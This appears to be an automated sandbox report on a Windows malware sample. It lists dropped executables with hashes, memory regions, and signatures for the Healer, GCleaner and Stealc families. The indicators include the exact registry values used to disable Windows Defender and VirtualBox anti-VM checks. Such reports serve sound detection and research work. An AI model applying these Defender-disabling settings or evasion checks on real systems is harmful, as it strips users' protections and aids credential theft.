| MD5 | 887a06313e83a1f942dfe0633ebab35e |
| SHA1 | 91e3d76ffab8e84ddaff3c2a865538c4cfcf5c43 |
| SHA256 | 8972faaf2cfe028f7f78735827bedab17b5a74466bb8f7fa330a2551372146e0 |
| SHA512 | 330dbe4758df0a86a1a991656aa42905085830d5919bde94b3d44f66bd875cd5f78ec42f03291d2b7f771d7b1550c2038663c053dc4604b0caf4f1c7afc16cf6 |
memory/900-162-0x0000000073F70000-0x00000000740E4000-memory.dmp
memory/900-163-0x0000000077310000-0x00000000774B9000-memory.dmp
memory/900-173-0x0000000000400000-0x000000000073B000-memory.dmp
memory/900-175-0x0000000050050000-0x0000000050CA7000-memory.dmp
memory/900-177-0x0000000050CB0000-0x00000000510C2000-memory.dmp
memory/944-183-0x0000000073F60000-0x00000000740D4000-memory.dmp
memory/944-184-0x0000000077310000-0x00000000774B9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe
| MD5 | 25db0c66dbb42d75a1de5e13a9802e86 |
| SHA1 | b65e57019f3832ede72f7693e871098304a22014 |
| SHA256 | 596875080b79f6ebee75e42670589d526693b97cfe70bf0da2181114f74734ee |
| SHA512 | fefb14ce0d6b3e7b2b71b28445496a29b6629ca48d3b73c50b8d9523730b703565600ebea8ce67f9321762eb01fe04f71cb5e2defbb6a75388a1270246b7220f |
memory/944-192-0x0000000073F60000-0x00000000740D4000-memory.dmp
memory/944-195-0x0000000000400000-0x000000000073B000-memory.dmp
memory/944-197-0x0000000050CB0000-0x00000000510C2000-memory.dmp
memory/944-196-0x0000000050050000-0x0000000050CA7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2d165389
| MD5 | 1a1f690628529628a7e7100bb5c7024c |
| SHA1 | 863c0eb62e4227c7909f8bee011132ad8c8ef970 |
| SHA256 | 450434da61490d0d65b92bfa188f6f624cfa18f7d5b057f12c888258f83e7b21 |
| SHA512 | 7c17619d4795c074c8c55347cca6b7003877438450a496ae5688d759a77d9c2b336b1c57ce128a3a90bb8d5be3b4cc18e78c7ce18781fd52c14868783ea12d38 |
memory/1272-221-0x0000000077310000-0x00000000774B9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
| MD5 | 102fcd8356de27eec44cc23ac19e2014 |
| SHA1 | 543722fbefc9dc51a294acc048eb9f6390624159 |
| SHA256 | 10a04ab9c631621719b2446353b01e0d761d325f126ce42e7ec7686c80437b0c |
| SHA512 | fa86031c45a0929f5d5f4aa4a24ac583be60fb72c2715765a111211984fe8dd84d236e94c3b4e339d9c9a4af0d71f0ae75aad290507b5ac245da365e6c242385 |
memory/1640-284-0x0000000000100000-0x00000000001D0000-memory.dmp
memory/2732-289-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2732-295-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2732-300-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2732-298-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2732-297-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2732-293-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2732-291-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2732-288-0x0000000000400000-0x0000000000466000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 36def1e8fb5a017722466e347f83eaae |
| SHA1 | 6be5c8d248dadfcbc3518f4eaa7319a42fd65d2f |
| SHA256 | 010353af910067cd07c93f61e6d4638909f0bd7b6e73549ccc50f8bc5ba720c4 |
| SHA512 | 1a110906ce58680dd92d97ec3b289c4c1618f8453fc7f35aaba23fa4a3fe4dfd1230227795f2dfeccfc1da87a47ecb513a7a9c1e340b942101ca66f396909b0e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
memory/1272-379-0x0000000073F60000-0x00000000740D4000-memory.dmp
\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
| MD5 | 967f4470627f823f4d7981e511c9824f |
| SHA1 | 416501b096df80ddc49f4144c3832cf2cadb9cb2 |
| SHA256 | b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91 |
| SHA512 | 8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c |
memory/2804-386-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp
memory/2804-385-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe
| MD5 | b12613919e61cc2fcff6eb82ceab1d20 |
| SHA1 | 88afc6a674c6f547f0a3289c7eaa78c5dfd3ede2 |
| SHA256 | 9dd603c9bbf8690dc426ff5b50911ae982a79de4f47d96878f4debd5180e754b |
| SHA512 | 27b2ccda40ef1876a3d71fa69062beccbe898522729ed6293fb583d48ed24aef061ed8a1f4ba389da26a66b1caca1c997cb6aaa169c8943eb14c08f7196e2a78 |
memory/2336-409-0x0000000000400000-0x0000000000885000-memory.dmp
memory/2984-407-0x00000000042B0000-0x0000000004735000-memory.dmp
memory/2984-406-0x00000000042B0000-0x0000000004735000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 15ad4b4d614f196106593a5831677cff |
| SHA1 | 524c77d6f7d5e9ba69e81cce72b321ba0841cccb |
| SHA256 | 2143a3f5c6d737b6f5376d46accfe3de1aaacbb262530933263663810826554f |
| SHA512 | 41a05509b5463533935b15369507df2a865dc75ec2b164006bef066233a9b62e01e0ecc918336bf2a3e2a25d0b333a7f92afeb610d61a7cd6cef9c3fc1f9dffe |
memory/2804-422-0x0000000000160000-0x0000000000476000-memory.dmp
memory/2804-423-0x0000000000160000-0x0000000000476000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d4dbbd4eca508154893b8ff61b22de26 |
| SHA1 | 5c32a553ae6be9e421ea77b1dc41e7f4605c51e3 |
| SHA256 | 04ede99212d82620adfbb836d00f764a0886e20fe33f05283b7f1f2ea580919e |
| SHA512 | af104aefda5964a08e92e15f72c5e5cb5470a88bc7d7fd920fe667142fc067451a1896fa9a58f15bfe29805284745743a98f1a392fd7ed44e0a6d9685ef291bb |
memory/2748-544-0x0000000073CD0000-0x0000000073E44000-memory.dmp
memory/2748-545-0x0000000077310000-0x00000000774B9000-memory.dmp
memory/2748-562-0x0000000050CB0000-0x00000000510C2000-memory.dmp
memory/2748-561-0x0000000050050000-0x0000000050CA7000-memory.dmp
memory/2748-560-0x0000000000400000-0x000000000073B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/2984-581-0x00000000042B0000-0x0000000004735000-memory.dmp
memory/2984-580-0x00000000042B0000-0x0000000004735000-memory.dmp
memory/2496-583-0x0000000073830000-0x00000000739A4000-memory.dmp
memory/1692-596-0x0000000001040000-0x00000000010A0000-memory.dmp
memory/2496-598-0x0000000077310000-0x00000000774B9000-memory.dmp
memory/2912-627-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2912-626-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2912-625-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2912-623-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2912-621-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2912-619-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2912-617-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2912-615-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2912-613-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2912-611-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2912-609-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2336-647-0x0000000000400000-0x0000000000885000-memory.dmp
memory/2336-646-0x0000000000400000-0x0000000000885000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10057930101\FvbuInU.exe
| MD5 | 9dadf2f796cd4500647ab74f072fd519 |
| SHA1 | 92b6c95a6ed1e120488bd28ac74274e874f6e740 |
| SHA256 | e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76 |
| SHA512 | fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d |
memory/2984-702-0x0000000004070000-0x000000000451C000-memory.dmp
memory/2340-703-0x0000000000CF0000-0x000000000119C000-memory.dmp
memory/2984-704-0x0000000004070000-0x000000000451C000-memory.dmp
memory/2496-708-0x0000000073830000-0x00000000739A4000-memory.dmp
memory/2496-710-0x0000000000400000-0x000000000073B000-memory.dmp
memory/2496-711-0x0000000050050000-0x0000000050CA7000-memory.dmp
memory/2496-712-0x0000000050CB0000-0x00000000510C2000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\ProgramData\BA1CBCAE27069C73.dat
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Temp\10059480101\1ZXaFij.exe
| MD5 | fe93a52fe64767a5ea5d347ade107dee |
| SHA1 | 8a642f7dfdc97360b25b4be5129a44b55e453b59 |
| SHA256 | 66cc7ecb9b97788b176b5f8105e47368e8c226b8d9d9bf2496f4b30999da8530 |
| SHA512 | cbbe35194a524da582535be846b9c83bd5ec6db9582c12c007a346fa802c0db0d3c1e3be75f6443614999887db1de8245e0ad89cecf92fb4f44d47e4b7e94cf8 |
memory/2676-835-0x0000000077310000-0x00000000774B9000-memory.dmp
memory/2336-847-0x0000000000400000-0x0000000000885000-memory.dmp
memory/2984-863-0x0000000004070000-0x000000000451C000-memory.dmp
memory/2340-896-0x0000000000CF0000-0x000000000119C000-memory.dmp
memory/2984-918-0x0000000004070000-0x000000000451C000-memory.dmp
memory/1736-952-0x000000001B3F0000-0x000000001B6D2000-memory.dmp
memory/1736-953-0x0000000001F30000-0x0000000001F38000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10059590101\Gidqgok.exe
| MD5 | eeb66cf49cbc8a9b1f0983cd75df2f0a |
| SHA1 | 0f6825f5bf527ed2e1aa7799e2f6685fd912021c |
| SHA256 | 21ee78d53bb58bd367455543d21f0b17a174083218054db1be84e82d30f225ce |
| SHA512 | 075267f3e959f6223ceef3baa7aaec7863cd730e31170bced880cce0d738e3d01d8cab07bd5e7399c56310b82b5dcc6c937678b851d37cf09c2c624ed77bdf8c |
memory/2984-987-0x0000000003E90000-0x0000000004347000-memory.dmp
memory/552-988-0x0000000000DE0000-0x0000000001297000-memory.dmp
memory/1736-1014-0x0000000002570000-0x0000000002578000-memory.dmp
memory/2336-1017-0x0000000000400000-0x0000000000885000-memory.dmp
memory/2340-1019-0x0000000000CF0000-0x000000000119C000-memory.dmp
memory/972-1025-0x000000001B310000-0x000000001B5F2000-memory.dmp
memory/972-1026-0x0000000002310000-0x0000000002318000-memory.dmp
memory/972-1043-0x0000000002900000-0x0000000002908000-memory.dmp
memory/2020-1050-0x0000000000AB0000-0x0000000000F67000-memory.dmp
memory/2984-1049-0x0000000003E90000-0x0000000004347000-memory.dmp
memory/2984-1054-0x0000000003E90000-0x0000000004347000-memory.dmp
memory/2984-1055-0x0000000003E90000-0x0000000004347000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10061070101\bwuGbC2.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
memory/552-1063-0x0000000000DE0000-0x0000000001297000-memory.dmp
memory/2984-1087-0x0000000003E90000-0x0000000004347000-memory.dmp
memory/2020-1089-0x0000000000AB0000-0x0000000000F67000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10000490101\netdriver.exe
| MD5 | 775d48c5ca9cec5cb17ba4990e100b80 |
| SHA1 | d51bdc3fc06fadd66fa0549c0c6924a52f980c91 |
| SHA256 | ee071cca5d50fc83f595410cd64d06f2c438424497bbafde868ee2356d8886a6 |
| SHA512 | de2a9adf415acf0d300c1d660141d4fcdcd15885750abdfa36253cb848cfb0d14f4529ce66ab8a6227d741fa52c7a6b59dc7253d269e0ffa0ebaa0782146f690 |
memory/864-1102-0x00000000039B0000-0x0000000003E06000-memory.dmp
memory/2148-1104-0x0000000000400000-0x0000000000856000-memory.dmp
memory/864-1103-0x00000000039B0000-0x0000000003E06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe
| MD5 | 7b45c3677c257113115f23dfcaa26814 |
| SHA1 | 336d8bbf5ed9e5ccfa84add87c63ec8ac64409a6 |
| SHA256 | 002a077540ad5c7b2b1d4f324abc7a47fd2eb4e5484401da948bb068c8dcb47f |
| SHA512 | 69e28d547fcdd5fe7718b2ec45fd5d0df4521afea6d5f483418a73fbf16804b4df81e4cc354bc8caec956656ee5af234300e1cbaa60d43a8f00752c1032531cd |
C:\Users\Admin\AppData\Local\Temp\10062570101\b6d1c8e25e.exe
| MD5 | 0282be73e52cb40d1893413356ecc019 |
| SHA1 | 288fe6f9b2cf7be34a2a2be1cb9be01d56048c49 |
| SHA256 | 7696e4e6fb26e0a6c4e320326e784f0d560db8922109a72e04076af0d72b0664 |
| SHA512 | be2447a02ee1b237cbf83c8c1d2dc876e79dbdab8297bb5a1ea3d4ffd8c8b1b2564327f285cac30f1f3b42480400e4259a6e323f5b7f265f6c91008ae85e8e82 |
memory/2148-1146-0x0000000000400000-0x0000000000856000-memory.dmp
memory/2900-1145-0x0000000000400000-0x000000000055C000-memory.dmp
memory/2984-1144-0x0000000004090000-0x00000000041EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062720101\7ee58999f0.exe
| MD5 | c47d95cdfaa1a720ab35c329eaf7ddeb |
| SHA1 | 0bfa3caf0a382415566209682cc24bb705cc1f68 |
| SHA256 | b002b8be5d3a93f326869492c1458fa14bfb83bbc23b5cd3208e80e27c4f12a9 |
| SHA512 | bc6c779ba802a90733e3bf68910eeeb734d00bfe351b0e8c44b3fa2efa8b962b7dc5c8aca3c40ccfcec452e15451454f0f08460e01130c3f335cb71df8feb438 |
memory/2020-1163-0x0000000000AB0000-0x0000000000F67000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA1 | efab18a8e2a33593049775958b05b95b0bb7d8e4 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
| SHA512 | be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74 |
memory/2900-1179-0x0000000000400000-0x000000000055C000-memory.dmp
memory/2984-1178-0x0000000004090000-0x00000000041EC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9LCUCRNJ1FDOQWNY3QJH.temp
| MD5 | c823aa2da1cfcba20afde34bd4f677de |
| SHA1 | 952cfe354bb1a331e93b0b96df344d9f1070f27c |
| SHA256 | ef2f68bf88d811bb6867ca4f8f9887c8776a33ed8870a8ab2b1ad6380910566c |
| SHA512 | 4fa9abd49180adbaea0697d3859fcf0b54de471ca92df09ae3ea31b64e17b2841cf3d89f39e494a165145ae39c710baebca5ca5e1f5d3af63ef02c4902dee152 |
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
| MD5 | 98d249e93dc8a0a37b9225c1f9a42abd |
| SHA1 | 695d7b5ef9ff0c135d5bc2522c5805c00020c82b |
| SHA256 | 5bc0bf81cd564d205ca4243e2111eb1ab116ba68ae65deea98cf3a2a52deaa8f |
| SHA512 | a1d5c86a0fe43bf0f9d3490c406b04eeae2259bf6f8a76a85819ee7364da5f42d775a36d06a6c2c518e33e8dfa4e90f3cfeb912e1a1023c23445aedb10935804 |
memory/2280-1323-0x0000000000400000-0x0000000000856000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe
| MD5 | 60dd2030e1ff1f9a3406ddc438893694 |
| SHA1 | b01f2c39b1046bc892c9db78898e1c063b21836f |
| SHA256 | d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee |
| SHA512 | 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246 |
memory/2596-1353-0x0000000000990000-0x00000000009EC000-memory.dmp
C:\ProgramData\00z58\p8q1n7
| MD5 | a1b220c367ca490d68aebe65c3bca3bf |
| SHA1 | 2ebbca56387ab4ad6261dc4bd2644847a665856a |
| SHA256 | 09bfda600d23d0fd3a6f6b1eb548d03117bb0e4bf9a8f69864bf31a9321630d8 |
| SHA512 | 331d21196bce1b1151850dd5270e6c2b43414e32cc35257b92697b9b513789728f638630581f419c54851e0273f567c9684b30fb2948b472acdb76ef2f0fa59d |
C:\ProgramData\00z58\v37ycb
| MD5 | 90a1d4b55edf36fa8b4cc6974ed7d4c4 |
| SHA1 | aba1b8d0e05421e7df5982899f626211c3c4b5c1 |
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
| SHA512 | ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2 |
C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe
| MD5 | ebcd88613fed4a2608bc1768817bce4d |
| SHA1 | afbba964372b91250c4c04ec9ee649a36a50b95f |
| SHA256 | 124e9553ae88df251e56e6dade1476fec8ef86fd579d978ca3b0d66ca3506a3e |
| SHA512 | 45f0bdf0c0c5d63662723110985b5dd7c295f70f79d55080dada64fa8480f074f6c7276f2a8acf712fd5793eabe3be77e2c72470ad282707eface715f1cbd113 |
memory/2984-1451-0x0000000004240000-0x00000000046F7000-memory.dmp
C:\ProgramData\00z58\yct0hv
| MD5 | 6d9ead954a1d55a4b7b9a23d96bb545e |
| SHA1 | b55a31428681654b9bc4f428fc4c07fa7244760f |
| SHA256 | eab705a4e697fa8c54cdbe7df8d46c679df9878c327a003819bb2bf72d90919c |
| SHA512 | b9422f770aa156c13f63399aae96d750f273a6db7c9177b725660aa236a04ca7c4e3bf64d394de3a1f1ec2ad49b60528023aee37b7c195ed70073c049980a322 |
memory/764-1457-0x0000000001150000-0x0000000001607000-memory.dmp
memory/2984-1453-0x0000000004240000-0x00000000046F7000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 9b1c99d5245940563e9e81e95c4832ec |
| SHA1 | 1bc5970a797d7160879f1ab93559a23b736a2ce7 |
| SHA256 | 5e5e2d6ab15529a13c5f6fddf4908f82199df64cd0fff65ec624e324f6f20a45 |
| SHA512 | 6d270d67927d391ddb39f5f2c3bbcbe36add45dc5cbf35099b0876b1b1c91f7ff23389e564bdf583fb4245984cd0a8af8f75ef87695296a8dc1d91269763b957 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000009.dbtmp
| MD5 | 979c29c2917bed63ccf520ece1d18cda |
| SHA1 | 65cd81cdce0be04c74222b54d0881d3fdfe4736c |
| SHA256 | b3524365a633ee6d1fa9953638d2867946c515218c497a5ec2dbef7dc44a7c53 |
| SHA512 | e38f694fd6ab9f678ae156528230d7a8bfb7b59a13b227f59f9c38ab5617db11ebb6be1276323a905d09c4066a3fe820cf58077ab48bf201f3c467a98516ee7a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000010.dbtmp
| MD5 | 60e3f691077715586b918375dd23c6b0 |
| SHA1 | 476d3eab15649c40c6aebfb6ac2366db50283d1b |
| SHA256 | e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee |
| SHA512 | d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e |
memory/2280-1516-0x0000000000400000-0x0000000000856000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-02 02:18
Reported
2025-03-02 02:21
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
144s
Command Line
Signatures
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Stealc
Stealc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
